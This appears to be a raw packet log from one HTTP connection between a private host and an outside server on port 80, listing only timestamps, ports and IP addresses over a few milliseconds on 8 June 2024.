Jun 8, 2024 20:22:07.683404922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683413982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683465004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683499098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683510065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683532000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683543921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683567047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683582067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683612108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683619022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683662891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683670044 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683707952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683720112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683753014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683798075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683804035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683840036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683885098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683891058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683936119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.683943033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.683975935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684020996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684032917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684066057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684099913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684112072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684134960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684144020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684170961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684182882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684205055 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684237957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684251070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684273958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684282064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684309006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684313059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684343100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684355974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684377909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684386969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684412956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684427977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684451103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684494972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684544086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684596062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684643030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684644938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684695959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684727907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684742928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684782982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684815884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684832096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684859037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684873104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684928894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.684973955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.684979916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685030937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685065031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685075998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685100079 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685110092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685133934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685142040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685177088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685185909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685220003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685228109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685255051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685291052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685305119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685321093 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685334921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685367107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685373068 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685406923 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685415983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685441017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685461998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685475111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685497046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685518980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685525894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685560942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685592890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685614109 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685626984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685645103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685676098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685678005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685712099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685745001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685760021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685779095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685791016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685813904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685828924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685857058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685866117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685899019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685910940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685950994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.685954094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.685987949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686022043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686038017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686054945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686069965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686089993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686100006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686131001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686145067 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686167955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686178923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686203003 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686217070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686239958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686259031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686275005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686295033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686309099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686331987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686359882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686362028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686394930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686429024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686441898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686463118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686472893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686497927 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686502934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686532974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686542988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686568975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686604977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686624050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686639071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686655998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686674118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686686993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686707973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686753035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686759949 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686810970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686845064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686861038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686878920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686892033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686913013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686924934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.686948061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686981916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.686994076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687016010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687026024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687052011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687056065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687087059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687093019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687122107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687129974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687161922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687194109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687207937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687223911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687238932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687258959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687269926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687295914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687303066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687335014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687345028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687381029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687386990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687421083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687454939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687469006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687489033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687501907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687525034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687530994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687557936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687572002 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687592983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687607050 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687627077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687661886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687676907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687696934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687709093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687731028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687741041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687767982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687778950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687803030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687813044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687836885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687851906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687872887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687887907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687906981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687928915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687939882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687951088 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.687975883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.687985897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688010931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688044071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688054085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688080072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688096046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688112020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688127041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688143969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688177109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688184977 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688206911 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688210964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688237906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688245058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688261032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688286066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688319921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688338041 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688354969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688369036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688389063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688399076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688424110 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688436985 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688457966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688471079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688504934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688512087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688549042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688558102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688585043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688599110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688618898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688632965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688654900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688667059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688689947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688710928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688724041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688740969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688756943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688771963 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688791037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688816071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688831091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688844919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688853025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688860893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688868046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688883066 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688896894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688896894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688914061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688916922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688930988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688936949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688947916 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688963890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688971043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.688981056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.688997030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689006090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689014912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689024925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689033031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689048052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689057112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689069033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689085007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689095974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689102888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689114094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689120054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689135075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689146996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689151049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689167023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689178944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689182997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689198017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689201117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689215899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689229965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689234018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689249039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689261913 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689264059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689280987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689284086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689296961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689306974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689313889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689328909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689338923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689347029 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689362049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689374924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689378977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689393997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689393997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689412117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689426899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689426899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689444065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689456940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689460039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689476013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689477921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689495087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689508915 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689511061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689527988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689541101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689543962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689559937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689559937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689578056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689590931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.689591885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689610004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.689623117 CEST	80	49731	23.88.106.134	192.168.2.4
